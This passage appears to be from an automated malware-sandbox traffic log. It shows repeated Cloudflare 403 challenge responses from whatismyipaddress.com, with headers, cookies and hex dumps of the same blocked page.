45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 15 Oct 2024 13:39:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4526Connection: closeReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 15 Oct 2024 13:40:03 GMTSet-Cookie: __cf_bm=f1HcTp4Mh3lmZto.Gzc.AT5Ix0xG4UgnN2cTfnm2iRk-1728999588-1.0.1.1-PndGfoVIVSCw_zYFFlO4S9q2OnApUbbdX_ls_VTFBflODamZIdtL8gAjAI96qFwu0vC4bJ_HBrDDlC_xHy.cbA; path=/; expires=Tue, 15-Oct-24 14:09:48 GMT; domain=.whatismyipaddress.com; HttpOnlyX-Frame-Options: DENYServer: cloudflareCF-RAY: 8d3037a2abeedafd-MIAalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 15 Oct 2024 13:39:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4526Connection: closeReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 15 Oct 2024 13:40:04 GMTSet-Cookie: __cf_bm=E3F9TcAbDwxgIw_jB78puRTCDn31ed_XiHjZ2Z3uvN4-1728999589-1.0.1.1-NISv8YYKyxEnb7thEwukTJqj8AFicTZWOM9B2o_vB02haPd6jAM53gFjLxVNWz1og_C84jDYFxq8Q2_ry.x2Ww; path=/; expires=Tue, 15-Oct-24 14:09:49 GMT; domain=.whatismyipaddress.com; HttpOnlyX-Frame-Options: DENYServer: cloudflareCF-RAY: 8d3037aace3209d2-MIAalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 15 Oct 2024 13:40:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4526Connection: closeReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 15 Oct 2024 13:40:23 GMTSet-Cookie: __cf_bm=pCja678nNOzcnlj8AIl5cqDoL9NDLXz1QeNDVA6F_2I-1728999608-1.0.1.1-jNkPh3_JSqg3HjaMHtTxI59ZJOB0l27_29eyo1YQjFfKtfHTVh8lsilpJR0cgtg2Z6H5vvK3oW_NW5WkTN6BFg; path=/; expires=Tue, 15-Oct-24 14:10:08 GMT; domain=.whatismyipaddress.com; HttpOnlyX-Frame-Options: DENYServer: cloudflareCF-RAY: 8d30381f0e2fa542-MIAalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 15 Oct 2024 13:40:21 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4526Connection: closeReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 15 Oct 2024 13:40:36 GMTSet-Cookie: __cf_bm=FBZ5FeMR7wf3rISjFLmDc0tPNN5B9I35CCWGeBJgFi4-1728999621-1.0.1.1-298NnIQqgeSTU1cH0rOuH6QS0cYt5xc8d.H8nnUWeeXaHzn4.YSG5I7PbSrFxc4fzVKDu6c_One0Gbx0CKgP9w; path=/; expires=Tue, 15-Oct-24 14:10:21 GMT; domain=.whatismyipaddress.com; HttpOnlyX-Frame-Options: DENYServer: cloudflareCF-RAY: 8d30386f7cf52248-MIAalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 15 Oct 2024 13:40:27 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4526Connection: closeReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 15 Oct 2024 13:40:42 GMTSet-Cookie: __cf_bm=3KmCd1iTglOQmKtxyeKONNrNCnlRmgWQGTWjR52AWUU-1728999627-1.0.1.1-w_UaW0tu59N_neXqjWixCLbUAGXl5Fc1ZSzu5lWp2qGXRcxW8LC2cl8OJp2i9gGaqhcB8ETQwQkqqOGmDVxVjQ; path=/; expires=Tue, 15-Oct-24 14:10:27 GMT; domain=.whatismyipaddress.com; HttpOnlyX-Frame-Options: DENYServer: cloudflareCF-RAY: 8d3038959d9aa528-MIAalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 15 Oct 2024 13:40:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4526Connection: closeReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 15 Oct 2024 13:40:53 GMTSet-Cookie: __cf_bm=ZUqrKhDp8xQn2DKspgYSS_EbV0bhRxRvgFryELuZ3O0-1728999638-1.0.1.1-upkv__2Z8cWMQyLaTM.2lOXjH2k6AKKbrH.NPjDs6cy7f0js8ACsPjezBVbHt9zJFXgwqaM0mnRp3puZNGxZYA; path=/; expires=Tue, 15-Oct-24 14:10:38 GMT; domain=.whatismyipaddress.com; HttpOnlyX-Frame-Options: DENYServer: cloudflareCF-RAY: 8d3038db1c7ca689-MIAalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 15 Oct 2024 13:40:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4526Connection: closeReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 15 Oct 2024 13:40:56 GMTSet-Cookie: __cf_bm=R.k1EjMfwQgTcDAR7aOiHCEUxF3je0_1LAbNJSfr2hY-1728999641-1.0.1.1-hpT_lPPXA6iDgRL3peV9w1XsZWO4bh4fJPtetgMjszkNtTwNJCdhW57tQvO2Zn5V_63zqe99GkHtCuMhWQE6Qw; path=/; expires=Tue, 15-Oct-24 14:10:41 GMT; domain=.whatismyipaddress.com; HttpOnlyX-Frame-Options: DENYServer: cloudflareCF-RAY: 8d3038efff7031da-MIAalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 